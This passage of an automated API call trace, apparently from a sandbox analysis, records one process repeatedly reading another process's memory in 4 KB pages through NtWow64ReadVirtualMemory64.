BufferSize=0x2703000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c4000, Buffer=0x7ff8, BufferSize=0x2704000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c5000, Buffer=0x7ff8, BufferSize=0x2705000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c6000, Buffer=0x7ff8, BufferSize=0x2706000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c7000, Buffer=0x7ff8, BufferSize=0x2707000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c8000, Buffer=0x7ff8, BufferSize=0x2708000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c9000, Buffer=0x7ff8, BufferSize=0x2709000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ca000, Buffer=0x7ff8, BufferSize=0x270a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cb000, Buffer=0x7ff8, BufferSize=0x270b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cc000, Buffer=0x7ff8, BufferSize=0x270c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cd000, Buffer=0x7ff8, BufferSize=0x270d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ce000, Buffer=0x7ff8, BufferSize=0x270e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3cf000, Buffer=0x7ff8, BufferSize=0x270f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d0000, Buffer=0x7ff8, BufferSize=0x2710000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d1000, Buffer=0x7ff8, BufferSize=0x2711000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d2000, Buffer=0x7ff8, BufferSize=0x2712000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d3000, Buffer=0x7ff8, BufferSize=0x2713000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d4000, Buffer=0x7ff8, BufferSize=0x2714000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d5000, Buffer=0x7ff8, BufferSize=0x2715000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d6000, Buffer=0x7ff8, BufferSize=0x2716000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d7000, Buffer=0x7ff8, BufferSize=0x2717000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d8000, Buffer=0x7ff8, BufferSize=0x2718000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3d9000, Buffer=0x7ff8, BufferSize=0x2719000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3da000, Buffer=0x7ff8, BufferSize=0x271a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3db000, Buffer=0x7ff8, BufferSize=0x271b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3dc000, Buffer=0x7ff8, BufferSize=0x271c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3dd000, Buffer=0x7ff8, BufferSize=0x271d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3de000, Buffer=0x7ff8, BufferSize=0x271e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3df000, Buffer=0x7ff8, BufferSize=0x271f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e0000, Buffer=0x7ff8, BufferSize=0x2720000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e1000, Buffer=0x7ff8, BufferSize=0x2721000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e2000, Buffer=0x7ff8, BufferSize=0x2722000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e3000, Buffer=0x7ff8, BufferSize=0x2723000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e4000, Buffer=0x7ff8, BufferSize=0x2724000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e5000, Buffer=0x7ff8, BufferSize=0x2725000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e6000, Buffer=0x7ff8, BufferSize=0x2726000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e7000, Buffer=0x7ff8, BufferSize=0x2727000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e8000, Buffer=0x7ff8, BufferSize=0x2728000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3e9000, Buffer=0x7ff8, BufferSize=0x2729000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ea000, Buffer=0x7ff8, BufferSize=0x272a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3eb000, Buffer=0x7ff8, BufferSize=0x272b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ec000, Buffer=0x7ff8, BufferSize=0x272c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ed000, Buffer=0x7ff8, BufferSize=0x272d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ee000, Buffer=0x7ff8, BufferSize=0x272e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ef000, Buffer=0x7ff8, BufferSize=0x272f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f0000, Buffer=0x7ff8, BufferSize=0x2730000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f1000, Buffer=0x7ff8, BufferSize=0x2731000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f2000, Buffer=0x7ff8, BufferSize=0x2732000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f3000, Buffer=0x7ff8, BufferSize=0x2733000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f4000, Buffer=0x7ff8, BufferSize=0x2734000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f5000, Buffer=0x7ff8, BufferSize=0x2735000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f6000, Buffer=0x7ff8, BufferSize=0x2736000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f7000, Buffer=0x7ff8, BufferSize=0x2737000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f8000, Buffer=0x7ff8, BufferSize=0x2738000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3f9000, Buffer=0x7ff8, BufferSize=0x2739000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fa000, Buffer=0x7ff8, BufferSize=0x273a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fb000, Buffer=0x7ff8, BufferSize=0x273b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fc000, Buffer=0x7ff8, BufferSize=0x273c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fd000, Buffer=0x7ff8, BufferSize=0x273d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3fe000, Buffer=0x7ff8, BufferSize=0x273e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ff000, Buffer=0x7ff8, BufferSize=0x273f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee400000, Buffer=0x7ff8, BufferSize=0x2740000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee401000, Buffer=0x7ff8, BufferSize=0x2741000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee402000, Buffer=0x7ff8, BufferSize=0x2742000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee403000, Buffer=0x7ff8, BufferSize=0x2743000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee404000, Buffer=0x7ff8, BufferSize=0x2744000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee405000, Buffer=0x7ff8, BufferSize=0x2745000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee406000, Buffer=0x7ff8, BufferSize=0x2746000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee407000, Buffer=0x7ff8, BufferSize=0x2747000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee408000, Buffer=0x7ff8, BufferSize=0x2748000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee409000, Buffer=0x7ff8, BufferSize=0x2749000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40a000, Buffer=0x7ff8, BufferSize=0x274a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40b000, Buffer=0x7ff8, BufferSize=0x274b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40c000, Buffer=0x7ff8, BufferSize=0x274c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40d000, Buffer=0x7ff8, BufferSize=0x274d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40e000, Buffer=0x7ff8, BufferSize=0x274e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee40f000, Buffer=0x7ff8, BufferSize=0x274f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee410000, Buffer=0x7ff8, BufferSize=0x2750000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee411000, Buffer=0x7ff8, BufferSize=0x2751000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee412000, Buffer=0x7ff8, BufferSize=0x2752000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee413000, Buffer=0x7ff8, BufferSize=0x2753000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee414000, Buffer=0x7ff8, BufferSize=0x2754000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee415000, Buffer=0x7ff8, BufferSize=0x2755000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee416000, Buffer=0x7ff8, BufferSize=0x2756000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee417000, Buffer=0x7ff8, BufferSize=0x2757000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee418000, Buffer=0x7ff8, BufferSize=0x2758000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee419000, Buffer=0x7ff8, BufferSize=0x2759000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41a000, Buffer=0x7ff8, BufferSize=0x275a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41b000, Buffer=0x7ff8, BufferSize=0x275b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41c000, Buffer=0x7ff8, BufferSize=0x275c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41d000, Buffer=0x7ff8, BufferSize=0x275d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41e000, Buffer=0x7ff8, BufferSize=0x275e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee41f000, Buffer=0x7ff8, BufferSize=0x275f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee420000, Buffer=0x7ff8, BufferSize=0x2760000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee421000, Buffer=0x7ff8, BufferSize=0x2761000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee422000, Buffer=0x7ff8, BufferSize=0x2762000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee423000, Buffer=0x7ff8, BufferSize=0x2763000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee424000, Buffer=0x7ff8, BufferSize=0x2764000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee425000, Buffer=0x7ff8, BufferSize=0x2765000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee426000, Buffer=0x7ff8, BufferSize=0x2766000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee427000, Buffer=0x7ff8, BufferSize=0x2767000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee428000, Buffer=0x7ff8, BufferSize=0x2768000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee429000, Buffer=0x7ff8, BufferSize=0x2769000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42a000, Buffer=0x7ff8, BufferSize=0x276a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42b000, Buffer=0x7ff8, BufferSize=0x276b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42c000, Buffer=0x7ff8, BufferSize=0x276c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42d000, Buffer=0x7ff8, BufferSize=0x276d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42e000, Buffer=0x7ff8, BufferSize=0x276e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee42f000, Buffer=0x7ff8, BufferSize=0x276f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee430000, Buffer=0x7ff8, BufferSize=0x2770000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee431000, Buffer=0x7ff8, BufferSize=0x2771000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee432000, Buffer=0x7ff8, BufferSize=0x2772000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee433000, Buffer=0x7ff8, BufferSize=0x2773000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee434000, Buffer=0x7ff8, BufferSize=0x2774000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 